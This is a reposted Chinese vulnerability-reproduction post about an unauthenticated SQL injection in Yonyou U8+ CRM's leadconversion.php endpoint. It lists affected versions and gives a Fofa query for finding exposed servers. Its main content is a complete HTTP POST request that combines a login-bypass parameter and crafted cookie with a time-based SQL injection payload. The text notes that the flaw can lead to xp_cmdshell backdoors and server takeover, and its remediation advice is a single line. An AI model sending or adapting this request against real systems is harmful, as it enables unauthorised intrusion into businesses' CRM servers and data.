自学内容网 自学内容网

用友U8+CRM leadconversion.php SQL注入复现

0x01 产品描述:

        用友U8-CRM是企业利用信息技术,是一项商业策略,它通过依据市场细分组织企业资源、培养以客户为中心的经营行为、执行以客户为中心的业务流程等手段来优化企业的客户满意度和获利能力。

0x02 漏洞描述:

         用友 U8 CRM客户关系管理系统 /leadconversion.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

0x03 影响版本:

V18, V16.5, V16.1, V16.0, V15.1, V13

0x04 搜索语句:

Fofa:title="用友U8CRM"

0x05 漏洞复现:

POST /lead/leadconversion.php HTTP/1.1
Upgrade-Insecure-Requests: 1
Host: your-ip
Cookie: PHPSESSID=bgsesstimeout-;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

DontCheckLogin=1&Action=getDeptName&userid=1%27;WAITFOR+DELAY+%270:0:5%27--

 

0x06 修复建议:

厂商已发布补丁,请即时修复


原文地址:https://blog.csdn.net/xc_214/article/details/142634989

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!